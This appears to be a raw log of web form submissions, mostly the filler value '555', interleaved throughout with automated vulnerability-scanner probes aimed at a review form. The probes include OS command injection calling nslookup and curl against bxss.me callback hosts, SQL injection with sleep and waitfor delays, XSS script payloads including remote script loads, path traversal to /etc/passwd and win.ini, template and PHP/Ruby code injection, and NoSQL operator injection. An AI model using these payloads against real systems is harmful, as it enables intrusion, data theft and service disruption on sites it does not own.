555
555
|echo zjbdcq$()\ xzqwmw\nz^xyu||a #' |echo zjbdcq$()\ xzqwmw\nz^xyu||a #|" |echo zjbdcq$()\ xzqwmw\nz^xyu||a #
555
555
555
555
555
;(nslookup -q=cname hitnkppssurywb69c6.bxss.me||curl hitnkppssurywb69c6.bxss.me)|(nslookup -q=cname hitnkppssurywb69c6.bxss.me||curl hitnkppssurywb69c6.bxss.me)&(nslookup -q=cname hitnkppssurywb69c6.bxss.me||curl hitnkppssurywb69c6.bxss.me)
555
555r6gtNyjV
HttP://bxss.me/t/xss.html?%00
555
555
bxss.me/t/xss.html?%00
555
555
xfs.bxss.me
555
555
555
555
555
dfb[[${98991*97996}]]xca
"+"A".concat(70-3).concat(22*4).concat(117).concat(78).concat(113).concat(74)+(require"socket" Socket.gethostbyname("hitux"+"scbgwpwz721e8.bxss.me.")[3].to_s)+"
'"
555
<!--
555
dfb__${98991*97996}__::.x
555
555
555
{"inline"=>"<%=`nslookup @`%>"}
555
555
555
555
-1 OR 2+792-792-1=0+0+0+1
555
555
555
-1" OR 2+584-584-1=0+0+0+1 --
";print(md5(31337));$a="
'.gethostbyname(lc('hithp'.'ukufazjzdcac3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(89).chr(112).chr(79).'
555
{"$eq"=>"555"}
${@print(md5(31337))}\
@@a0jz8
-1" OR 2+191-191-1=0+0+0+1 --
555<script>zAdL(9576)</script>
555
555
555<script>zAdL(9786)</script>9786
555
<%={{={@{#{${dfb}}%>
555
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
555
555
dfb[[${98991*97996}]]xca
^(#$!@#$)(()))******
../../../../../../../../../../../../../../windows/win.ini
|echo nfmbzd$()\ kiixhz\nz^xyu||a #' |echo nfmbzd$()\ kiixhz\nz^xyu||a #|" |echo nfmbzd$()\ kiixhz\nz^xyu||a #
dfb__${98991*97996}__::.x
555
file:///etc/passwd
/etc/shells
"+response.write(9223954*9901697)+"
555
xfs.bxss.me
555
555
555
&nslookup -q=cname hitqabbeukacbc7594.bxss.me&'\"`0&nslookup -q=cname hitqabbeukacbc7594.bxss.me&`'
555
555
555
555
555
555
555
555
555|echo eydrgl$()\ evbhbs\nz^xyu||a #' |echo eydrgl$()\ evbhbs\nz^xyu||a #|" |echo eydrgl$()\ evbhbs\nz^xyu||a #
555
'+response.write(9298009*9327476)+'
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
place_review
555
555
555
-1 OR 2+803-803-1=0+0+0+1
555
555
".gethostbyname(lc("hitgo"."vdwbtuxw52b71.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(68).chr(97).chr(75)."
5559297468
{"$regex"=>"^555$"}
555
555
555'"
555'&&sleep(27*1000)*udkuqk&&'
555"&&sleep(27*1000)*cprahr&&"
555
555"||sleep(27*1000)*wazxjk||"
555
555<ScRiPt >zAdL(9178)</ScRiPt>
<th:t="${dfb}#foreach
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
Http://bxss.me/t/fit.txt
'+response.write(9223954*9901697)+'
../555
["555"]
555
555
555
&(nslookup -q=cname hitcyuhbqenhmea6bd.bxss.me||curl hitcyuhbqenhmea6bd.bxss.me)&'\"`0&(nslookup -q=cname hitcyuhbqenhmea6bd.bxss.me||curl hitcyuhbqenhmea6bd.bxss.me)&`'
"+"A".concat(70-3).concat(22*4).concat(110).concat(87).concat(111).concat(68)+(require"socket" Socket.gethostbyname("hitdv"+"ciemofkp6523e.bxss.me.")[3].to_s)+"
555
555
555
555
<!--
{"information_schema where (select 0) or sleep(30) /*HNwMVIjG*/; -- .user"=>{"1"=>"1"}}
1vtRXqHeO
555<esi:include src="http://bxss.me/rpb.png"/>
${10000349+9999420}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
Http://bxss.me/t/fit.txt
555
)
&echo jpsuwf$()\ fbqjds\nz^xyu||a #' &echo jpsuwf$()\ fbqjds\nz^xyu||a #|" &echo jpsuwf$()\ fbqjds\nz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
place_review/.
555<ScR<ScRiPt>IpT>zAdL(9752)</sCr<ScRiPt>IpT>
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999921+9999515}
555
555
555
555
)
555
../../../../../../../../../../../../../../etc/passwd
Http://bxss.me/t/fit.txt
&echo arvmoh$()\ triuwd\nz^xyu||a #' &echo arvmoh$()\ triuwd\nz^xyu||a #|" &echo arvmoh$()\ triuwd\nz^xyu||a #
!(()&&!|*|*|
555&echo najopy$()\ hrfajd\nz^xyu||a #' &echo najopy$()\ hrfajd\nz^xyu||a #|" &echo najopy$()\ hrfajd\nz^xyu||a #
response.write(9223954*9901697)
http://bxss.me/t/fit.txt?.jpg
555
555
555
/etc/shells
555
555
/etc/shells
555
(nslookup -q=cname hituozvfqflib049da.bxss.me||curl hituozvfqflib049da.bxss.me))
bxss.me/t/xss.html?%00
555
555
555
|(nslookup -q=cname hitzuvmkvjaxtd9f11.bxss.me||curl hitzuvmkvjaxtd9f11.bxss.me)
555
555
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
/etc/shells
c:/windows/win.ini
^(#$!@#$)(()))******
file:///etc/passwd
bxss.me
555
../555
555
555
555
555
&nslookup -q=cname hitycutufzmpu17049.bxss.me&'\"`0&nslookup -q=cname hitycutufzmpu17049.bxss.me&`'
|(nslookup -q=cname hitkfczmrbbww90cb1.bxss.me||curl hitkfczmrbbww90cb1.bxss.me)
555
555
555
"+response.write(9298009*9327476)+"
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
../../../../../../../../../../../../../../etc/passwd
555
echo xlxzak$()\ cpquzi\nz^xyu||a #' &echo xlxzak$()\ cpquzi\nz^xyu||a #|" &echo xlxzak$()\ cpquzi\nz^xyu||a #
555
555
555|echo ypouku$()\ xhmimv\nz^xyu||a #' |echo ypouku$()\ xhmimv\nz^xyu||a #|" |echo ypouku$()\ xhmimv\nz^xyu||a #
555|echo ypouku$()\ xhmimv\nz^xyu||a #' |echo ypouku$()\ xhmimv\nz^xyu||a #|" |echo ypouku$()\ xhmimv\nz^xyu||a #
HttP://bxss.me/t/xss.html?%00
c:/windows/win.ini
555
555
$(nslookup -q=cname hitzxwwbpjxgk4c557.bxss.me||curl hitzxwwbpjxgk4c557.bxss.me)
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bxss.me
place_review
555
555
555
555<ScRiPt >Xn4U(9567)</ScRiPt>
555
555
place_review/.
555
'+'A'.concat(70-3).concat(22*4).concat(101).concat(85).concat(104).concat(78)+(require'socket' Socket.gethostbyname('hityk'+'gftaiugr23c54.bxss.me.')[3].to_s)+'
'"
`(nslookup -q=cname hittzfgubhrdi07bba.bxss.me||curl hittzfgubhrdi07bba.bxss.me)`
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
!(()&&!|*|*|
../../../../../../../../../../../../../../windows/win.ini
echo wpjycd$()\ lucjry\nz^xyu||a #' &echo wpjycd$()\ lucjry\nz^xyu||a #|" &echo wpjycd$()\ lucjry\nz^xyu||a #
555
555
555&echo yekbxl$()\ crgqgt\nz^xyu||a #' &echo yekbxl$()\ crgqgt\nz^xyu||a #|" &echo yekbxl$()\ crgqgt\nz^xyu||a #
|echo ljkqce$()\ vuhywf\nz^xyu||a #' |echo ljkqce$()\ vuhywf\nz^xyu||a #|" |echo ljkqce$()\ vuhywf\nz^xyu||a #
(nslookup -q=cname hitqocnsgeffc23a18.bxss.me||curl hitqocnsgeffc23a18.bxss.me))
555
$(nslookup -q=cname hitcfbggyqrft60006.bxss.me||curl hitcfbggyqrft60006.bxss.me)
555
&(nslookup -q=cname hitrtjlzfcuiya87a3.bxss.me||curl hitrtjlzfcuiya87a3.bxss.me)&'\"`0&(nslookup -q=cname hitrtjlzfcuiya87a3.bxss.me||curl hitrtjlzfcuiya87a3.bxss.me)&`'
`(nslookup -q=cname hitakotmxjcuzf093d.bxss.me||curl hitakotmxjcuzf093d.bxss.me)`
555
;(nslookup -q=cname hitzuzyfvgznh7d2ef.bxss.me||curl hitzuzyfvgznh7d2ef.bxss.me)|(nslookup -q=cname hitzuzyfvgznh7d2ef.bxss.me||curl hitzuzyfvgznh7d2ef.bxss.me)&(nslookup -q=cname hitzuzyfvgznh7d2ef.bxss.me||curl hitzuzyfvgznh7d2ef.bxss.me)
555
response.write(9298009*9327476)
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(111).concat(88).concat(104).concat(71)+(require"socket" Socket.gethostbyname("hitqn"+"wfsxtgrsbb65a.bxss.me.")[3].to_s)+"
555
555
{"inline"=>"<%=`nslookup @`%>"}
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
{"$eq"=>"555"}
${@print(md5(31337))}
555
{"$nin"=>["555"]}
'"()
555
555
555
bfg5588<s1﹥s2ʺs3ʹhjl5588
555NLLcKNQz
555
555
555
555
-1 OR 2+536-536-1=0+0+0+1
555
555
555
-1" OR 2+986-986-1=0+0+0+1 --
555<ScRiPt >uPjo(9629)</ScRiPt>
555
555
555
["555"]
555
bxss.me/t/xss.html?%00
555
555
555
555
xfs.bxss.me
'+'A'.concat(70-3).concat(22*4).concat(117).concat(73).concat(109).concat(76)+(require'socket' Socket.gethostbyname('hiteu'+'ugbaovyl1507e.bxss.me.')[3].to_s)+'
<!--
555
555
{"information_schema where (select 0) or sleep(30) /*lEZ1iwKb*/; -- .user"=>{"1"=>"1"}}
555
555
555
555
555
555'&&sleep(27*1000)*tnlpdz&&'
555
5559372055
555
555
555
<%={{={@{#{${dfb}}%>
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
dfb__${98991*97996}__::.x
555
-1' OR 2+1-1-1=1 AND 120=120 or 'wXZCfHQg'='
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
'"
555
555
555
555
555
555
'.gethostbyname(lc('hitge'.'gpynlgou24cbb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(85).chr(119).chr(85).'
555
".gethostbyname(lc("hituq"."dgxihftb9e606.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(66).chr(103).chr(68)."
";print(md5(31337));$a="
555
555
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555"||sleep(27*1000)*hqnfey||"
555
555
555
555
555
555
555
555
555
555
555
555
555
dfb{{98991*97996}}xca
555
-1' OR 3*2<(0+5+120-120) or 'wXZCfHQg'='
-1' OR 2+1-1+1=1 AND 120=120 or 'wXZCfHQg'='
555
555<WEIOQJ>KNG0E[!+!]</WEIOQJ>
{"information_schema where (select 0) or sleep(30) /*lEZ1iwKb*/; -- .user"=>{"1"=>"1"}}
555
555
555'"()&%<zzz><ScRiPt >uPjo(9862)</ScRiPt>
{"$testing"=>"1"}
'"()&%<zzz><ScRiPt >uPjo(9939)</ScRiPt>
555
555
555"&&sleep(27*1000)*rcappk&&"
555
555'||sleep(27*1000)*kzzlob||'
555
555
555
555
555
555
555
-1 OR 2+64-64-1=0+0+0+1 --
dfb[[${98991*97996}]]xca
-1' OR 2+441-441-1=0+0+0+1 --
555
-1' OR 3+120-120-1=0+0+0+1 or 'wXZCfHQg'='
555<script>uPjo(9237)</script>
555<script>uPjo(9040)</script>9040
555<ScR<ScRiPt>IpT>uPjo(9832)</sCr<ScRiPt>IpT>
555<ScRiPt >uPjo(9090)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9333></ScRiPt>
555
555
555
555<isindex type=image src=1 onerror=uPjo(9494)>
555*if(now()=sysdate(),sleep(15),0)
1Ls60hr4O
555<esi:include src="http://bxss.me/rpb.png"/>
${9999073+10000314}
555
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9560'>
555
555
555
555
555<body onload=uPjo(9235)>
)
../../../../../../../../../../../../../../etc/passwd
echo ufbwbg$()\ ehtxeu\nz^xyu||a #' &echo ufbwbg$()\ ehtxeu\nz^xyu||a #|" &echo ufbwbg$()\ ehtxeu\nz^xyu||a #
response.write(9998773*9712042)
Http://bxss.me/t/fit.txt
../../../../../../../../../../../../../../windows/win.ini
&echo xndpwk$()\ dnpeis\nz^xyu||a #' &echo xndpwk$()\ dnpeis\nz^xyu||a #|" &echo xndpwk$()\ dnpeis\nz^xyu||a #
'+response.write(9998773*9712042)+'
http://bxss.me/t/fit.txt?.jpg
^(#$!@#$)(()))******
file:///etc/passwd
555<img src=//xss.bxss.me/t/dot.gif onload=uPjo(9983)>
555&echo mlbcpy$()\ uzrmpz\nz^xyu||a #' &echo mlbcpy$()\ uzrmpz\nz^xyu||a #|" &echo mlbcpy$()\ uzrmpz\nz^xyu||a #
"+response.write(9998773*9712042)+"
/etc/shells
555
555
|echo vfiwlc$()\ vvfbih\nz^xyu||a #' |echo vfiwlc$()\ vvfbih\nz^xyu||a #|" |echo vfiwlc$()\ vvfbih\nz^xyu||a #
555
c:/windows/win.ini
555
../555
555|echo qhteaw$()\ vzmawp\nz^xyu||a #' |echo qhteaw$()\ vzmawp\nz^xyu||a #|" |echo qhteaw$()\ vzmawp\nz^xyu||a #
555<img src=xyz OnErRor=uPjo(9679)>
555
bxss.me
555
555
555
&(nslookup -q=cname hitymcdksmhkfa1d46.bxss.me||curl hitymcdksmhkfa1d46.bxss.me)&'\"`0&(nslookup -q=cname hitymcdksmhkfa1d46.bxss.me||curl hitymcdksmhkfa1d46.bxss.me)&`'
555
555
|(nslookup -q=cname hityzitxsycfjd515c.bxss.me||curl hityzitxsycfjd515c.bxss.me)
555
;(nslookup -q=cname hitskgfznfnilfe4d3.bxss.me||curl hitskgfznfnilfe4d3.bxss.me)|(nslookup -q=cname hitskgfznfnilfe4d3.bxss.me||curl hitskgfznfnilfe4d3.bxss.me)&(nslookup -q=cname hitskgfznfnilfe4d3.bxss.me||curl hitskgfznfnilfe4d3.bxss.me)
555
{"information_schema where (select 0) or sleep(30) /*PrZTIs8G*/; -- .user"=>{"1"=>"1"}}
555
555
555
555
555117pf <ScRiPt >uPjo(9334)</ScRiPt>
555
5559507050
";print(md5(31337));$a="
555
{"$testing"=>"1"}
555<esi:include src="http://bxss.me/rpb.png"/>
555
'.print(md5(31337)).'
{"$nin"=>["555"]}
${9999861+10000094}
555
555"||sleep(27*1000)*rjtfui||"
Http://bxss.me/t/fit.txt
555
555
555
555
555
555
555
5550DNCiyg0
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
$(nslookup -q=cname hitmlrttuajje5f656.bxss.me||curl hitmlrttuajje5f656.bxss.me)
555
555<input autofocus onfocus=uPjo(9574)>
555
555
'+'A'.concat(70-3).concat(22*4).concat(109).concat(88).concat(109).concat(67)+(require'socket' Socket.gethostbyname('hityv'+'ufvnnmah608a3.bxss.me.')[3].to_s)+'
555
555
place_review/.
555
555
555
555
555
555
555
555
555
555
555
{"information_schema where (select 0) or sleep(30) /*PrZTIs8G*/; -- .user"=>{"1"=>"1"}}
{"inline"=>"<%=`nslookup @`%>"}
555
<a HrEF=jaVaScRiPT:>
555'"()&%<zzz><ScRiPt >8XaG(9515)</ScRiPt>
555
';print(md5(31337));$a='
555
bfg10322<s1﹥s2ʺs3ʹhjl10322
555'&&sleep(27*1000)*fljlgr&&'
<%={{={@{#{${dfb}}%>
555
../../../../../../../../../../../../../../windows/win.ini
^(#$!@#$)(()))******
555
555
555
555
555
555
555
&nslookup -q=cname hitcwpercugwg30d45.bxss.me&'\"`0&nslookup -q=cname hitcwpercugwg30d45.bxss.me&`'
555
555
response.write(9720962*9906591)
&(nslookup -q=cname hitertfsnzpwr4795b.bxss.me||curl hitertfsnzpwr4795b.bxss.me)&'\"`0&(nslookup -q=cname hitertfsnzpwr4795b.bxss.me||curl hitertfsnzpwr4795b.bxss.me)&`'
555
555
555
555
;(nslookup -q=cname hitgsnilarktp5f58a.bxss.me||curl hitgsnilarktp5f58a.bxss.me)|(nslookup -q=cname hitgsnilarktp5f58a.bxss.me||curl hitgsnilarktp5f58a.bxss.me)&(nslookup -q=cname hitgsnilarktp5f58a.bxss.me||curl hitgsnilarktp5f58a.bxss.me)
555
555
555
555
xfs.bxss.me
555
555
555
555
555
555}body{zzz:Expre/**/SSion(uPjo(9654))}
'"()&%<zzz><ScRiPt >8XaG(9392)</ScRiPt>
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
'.gethostbyname(lc('hitkc'.'yxxqwtmzc9e97.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(65).chr(97).chr(70).'
${@print(md5(31337))}
555
555
555
555
555<ifRAme sRc=9109.com></IfRamE>
'"()
555
555
http://bxss.me/t/fit.txt?.jpg
555
file:///etc/passwd
555
555
555
555<img sRc='http://attacker-9186/log.php?
555
echo sbauhk$()\ jfuxnp\nz^xyu||a #' &echo sbauhk$()\ jfuxnp\nz^xyu||a #|" &echo sbauhk$()\ jfuxnp\nz^xyu||a #
555
c:/windows/win.ini
../555
555
(nslookup -q=cname hitytlstiqogk344d3.bxss.me||curl hitytlstiqogk344d3.bxss.me))
555
555
$(nslookup -q=cname hittdhpkovfbt31f1a.bxss.me||curl hittdhpkovfbt31f1a.bxss.me)
'+response.write(9720962*9906591)+'
555
HttP://bxss.me/t/xss.html?%00
555
555
dfb{{98991*97996}}xca
555
555
'"
555-1; waitfor delay '0:0:15' --
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%75%50%6A%6F%289596%29%3C%2F%73%43%72%69%70%54%3E
555
&nslookup -q=cname hitlcknsasqas6cd81.bxss.me&'\"`0&nslookup -q=cname hitlcknsasqas6cd81.bxss.me&`'
555
`(nslookup -q=cname hitslqytqbkhf120dc.bxss.me||curl hitslqytqbkhf120dc.bxss.me)`
555
555\u003CScRiPt\uPjo(9381)\u003C/sCripT\u003E
555
555
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
["555"]
HttP://bxss.me/t/xss.html?%00
555
555<ScRiPt>uPjo(9820)</sCripT>
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
place_review
"+"A".concat(70-3).concat(22*4).concat(115).concat(75).concat(111).concat(75)+(require"socket" Socket.gethostbyname("hitwd"+"ydvpnfup83c99.bxss.me.")[3].to_s)+"
'"
<a HrEF=http://xss.bxss.me></a>
555
<!--
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555<WOMNUS>NFCAK[!+!]</WOMNUS>
".gethostbyname(lc("hithd"."afijlsrz2cd29.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(66).chr(115).chr(84)."
${@print(md5(31337))}\
{"$eq"=>"555"}
555
555
555
555
555"&&sleep(27*1000)*gefatg&&"
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
)
555<aSNnU6z x=9932>
555
555'||sleep(27*1000)*pgmdfv||'
../../../../../../../../../../../../../../etc/passwd
!(()&&!|*|*|
555
/etc/shells
555
&echo cjooil$()\ wgieft\nz^xyu||a #' &echo cjooil$()\ wgieft\nz^xyu||a #|" &echo cjooil$()\ wgieft\nz^xyu||a #
555
bxss.me
555
<th:t="${dfb}#foreach
555&echo tdizqs$()\ degfyz\nz^xyu||a #' &echo tdizqs$()\ degfyz\nz^xyu||a #|" &echo tdizqs$()\ degfyz\nz^xyu||a #
555
555
555
|echo wnveft$()\ nvgsnm\nz^xyu||a #' |echo wnveft$()\ nvgsnm\nz^xyu||a #|" |echo wnveft$()\ nvgsnm\nz^xyu||a #
555
555
555<aY3Yeuw<
555
555|echo qgcsyp$()\ afskoj\nz^xyu||a #' |echo qgcsyp$()\ afskoj\nz^xyu||a #|" |echo qgcsyp$()\ afskoj\nz^xyu||a #
555
555
555
555
555
555
555
555
555
|(nslookup -q=cname hitesipktcjtxd05d4.bxss.me||curl hitesipktcjtxd05d4.bxss.me)
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
"+response.write(9720962*9906591)+"
`(nslookup -q=cname hitgpayekkiowc1f1e.bxss.me||curl hitgpayekkiowc1f1e.bxss.me)`
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
555
555
bxss.me/t/xss.html?%00
555
555
["555"]
xfs.bxss.me
555
555
555
555
place_review
555
555
555
dfb[[${98991*97996}]]xca
555
555
{"information_schema where (select 0) or sleep(30) /*reQIN6Mx*/; -- .user"=>{"1"=>"1"}}
{"$testing"=>"1"}
555
'.gethostbyname(lc('hithv'.'zcjsnonm66c11.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(80).chr(102).chr(87).'
';print(md5(31337));$a='
{"$regex"=>"tntjxf^"}
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
-1 OR 2+587-587-1=0+0+0+1 --
555
555
555
555
555
555
555
555
555
place_review/.
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(65).concat(120).concat(69)+(require"socket" Socket.gethostbyname("hitcx"+"sgdonujt3b487.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
<!--
555
555
dfb__${98991*97996}__::.x
{"information_schema where (select 0) or sleep(30) /*reQIN6Mx*/; -- .user"=>{"1"=>"1"}}
555
555
555
555
555
{"inline"=>"<%=`nslookup @`%>"}
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
";print(md5(31337));$a="
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
'+'A'.concat(70-3).concat(22*4).concat(105).concat(85).concat(112).concat(89)+(require'socket' Socket.gethostbyname('hitru'+'edoqkqqwb0aee.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >nZZb(9101)</ScRiPt>
555
555
555
555
555
".gethostbyname(lc("hitwp"."gofucirr9d163.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(76).chr(116).chr(85)."
{"$eq"=>"555"}
555<ScRiPt >8XaG(9199)</ScRiPt>
555
${@print(md5(31337))}
555
555
'"()
${9999041+9999466}
555
-1' OR 2+184-184-1=0+0+0+1 or 'jjLmaFki'='
555
555
Http://bxss.me/t/fit.txt
!(()&&!|*|*|
555
-1" OR 2+806-806-1=0+0+0+1 --
c:/windows/win.ini
555
555
bxss.me
/etc/shells
555
file:///etc/passwd
555
555<script>8XaG(9722)</script>9722
../555
555
555
555
response.write(9356638*9013617)
555&echo imxyvr$()\ ombgvk\nz^xyu||a #' &echo imxyvr$()\ ombgvk\nz^xyu||a #|" &echo imxyvr$()\ ombgvk\nz^xyu||a #
|echo putkcj$()\ wsgjeo\nz^xyu||a #' |echo putkcj$()\ wsgjeo\nz^xyu||a #|" |echo putkcj$()\ wsgjeo\nz^xyu||a #
'+response.write(9770482*9643909)+'
(nslookup -q=cname hitwheklvgspf7a06c.bxss.me||curl hitwheklvgspf7a06c.bxss.me))
"+response.write(9356638*9013617)+"
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
'"()&%<zzz><ScRiPt >nZZb(9053)</ScRiPt>
555'&&sleep(27*1000)*cvlkgs&&'
555
555
5559989953
555"&&sleep(27*1000)*evuepz&&"
555
555
-1 OR 2+50-50-1=0+0+0+1
555<W1QUQB>G5TQH[!+!]</W1QUQB>
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
-1' OR 2+489-489-1=0+0+0+1 --
)
555
http://bxss.me/t/fit.txt?.jpg
^(#$!@#$)(()))******
555
555
555'"
!(()&&!|*|*|
555
/etc/shells
Http://bxss.me/t/fit.txt
555
555
http://bxss.me/t/fit.txt?.jpg
555
@@HxYHU
555<script>8XaG(9162)</script>
555
555
555
555
file:///etc/passwd
555
555
555
555
"+response.write(9770482*9643909)+"
555
(nslookup -q=cname hitiqjpsnauhfde029.bxss.me||curl hitiqjpsnauhfde029.bxss.me))
555<ScRiPt >8XaG(9349)</ScRiPt>
555
555
555
|(nslookup -q=cname hitrlspxxhcqc89213.bxss.me||curl hitrlspxxhcqc89213.bxss.me)
;(nslookup -q=cname hitdxksyyeiqv55332.bxss.me||curl hitdxksyyeiqv55332.bxss.me)|(nslookup -q=cname hitdxksyyeiqv55332.bxss.me||curl hitdxksyyeiqv55332.bxss.me)&(nslookup -q=cname hitdxksyyeiqv55332.bxss.me||curl hitdxksyyeiqv55332.bxss.me)
555
555
555
555
555
555
555
555"||sleep(27*1000)*xmzhkx||"
555
)
555
555
555
555
555
c:/windows/win.ini
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
bxss.me
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
555
555
555
../555
555
555
555
echo afkzab$()\ kpbjqu\nz^xyu||a #' &echo afkzab$()\ kpbjqu\nz^xyu||a #|" &echo afkzab$()\ kpbjqu\nz^xyu||a #
555
555
555
555
555
555
&echo fqtexk$()\ twssrp\nz^xyu||a #' &echo fqtexk$()\ twssrp\nz^xyu||a #|" &echo fqtexk$()\ twssrp\nz^xyu||a #
555
echo nbrqwe$()\ eloxsf\nz^xyu||a #' &echo nbrqwe$()\ eloxsf\nz^xyu||a #|" &echo nbrqwe$()\ eloxsf\nz^xyu||a #
555
555&echo bxptqh$()\ cnhqtf\nz^xyu||a #' &echo bxptqh$()\ cnhqtf\nz^xyu||a #|" &echo bxptqh$()\ cnhqtf\nz^xyu||a #
555
&echo axdshw$()\ wktemp\nz^xyu||a #' &echo axdshw$()\ wktemp\nz^xyu||a #|" &echo axdshw$()\ wktemp\nz^xyu||a #
555erRlO1kY
|echo bxgqmy$()\ sxcbvj\nz^xyu||a #' |echo bxgqmy$()\ sxcbvj\nz^xyu||a #|" |echo bxgqmy$()\ sxcbvj\nz^xyu||a #
555
response.write(9770482*9643909)
555|echo qorsmp$()\ rhvlib\nz^xyu||a #' |echo qorsmp$()\ rhvlib\nz^xyu||a #|" |echo qorsmp$()\ rhvlib\nz^xyu||a #
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
^(#$!@#$)(()))******
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555<ScR<ScRiPt>IpT>8XaG(9681)</sCr<ScRiPt>IpT>
555|echo tcgton$()\ schdjy\nz^xyu||a #' |echo tcgton$()\ schdjy\nz^xyu||a #|" |echo tcgton$()\ schdjy\nz^xyu||a #
555
555
555
&nslookup -q=cname hitbhwvxgutrb9ef7b.bxss.me&'\"`0&nslookup -q=cname hitbhwvxgutrb9ef7b.bxss.me&`'
555
$(nslookup -q=cname hithejvpoufva2d1c2.bxss.me||curl hithejvpoufva2d1c2.bxss.me)
555
555
555
555
555
["555"]
555
555
555
555
;(nslookup -q=cname hitmteaoobcyc5a00d.bxss.me||curl hitmteaoobcyc5a00d.bxss.me)|(nslookup -q=cname hitmteaoobcyc5a00d.bxss.me||curl hitmteaoobcyc5a00d.bxss.me)&(nslookup -q=cname hitmteaoobcyc5a00d.bxss.me||curl hitmteaoobcyc5a00d.bxss.me)
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9455></ScRiPt>
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
'+response.write(9356638*9013617)+'
555
555
&nslookup -q=cname hitimbilkqrbea6967.bxss.me&'\"`0&nslookup -q=cname hitimbilkqrbea6967.bxss.me&`'
555
&(nslookup -q=cname hitacksxshikrf79ee.bxss.me||curl hitacksxshikrf79ee.bxss.me)&'\"`0&(nslookup -q=cname hitacksxshikrf79ee.bxss.me||curl hitacksxshikrf79ee.bxss.me)&`'
555
555
HttP://bxss.me/t/xss.html?%00
555
`(nslookup -q=cname hitafvdslecow00061.bxss.me||curl hitafvdslecow00061.bxss.me)`
555
555
555
555
555
555
xfs.bxss.me
place_review
555
$(nslookup -q=cname hitfvfhkkfpjh5413c.bxss.me||curl hitfvfhkkfpjh5413c.bxss.me)
555
555
&(nslookup -q=cname hitmdaxztwyks3ce30.bxss.me||curl hitmdaxztwyks3ce30.bxss.me)&'\"`0&(nslookup -q=cname hitmdaxztwyks3ce30.bxss.me||curl hitmdaxztwyks3ce30.bxss.me)&`'
|(nslookup -q=cname hitasenblicfza1ea3.bxss.me||curl hitasenblicfza1ea3.bxss.me)
555
bxss.me/t/xss.html?%00
`(nslookup -q=cname hitxsqgdkbdov30669.bxss.me||curl hitxsqgdkbdov30669.bxss.me)`
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
["555"]
555
555
555
555
555
bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(104).concat(66).concat(111).concat(74)+(require"socket" Socket.gethostbyname("hitia"+"ixaetktn8bc9f.bxss.me.")[3].to_s)+"
555
place_review
555
555
'"
555
555
555<isindex type=image src=1 onerror=8XaG(9856)>
'+'A'.concat(70-3).concat(22*4).concat(118).concat(72).concat(106).concat(89)+(require'socket' Socket.gethostbyname('hitti'+'twwttdose4a72.bxss.me.')[3].to_s)+'
555
place_review/.
555
555
<!--
555
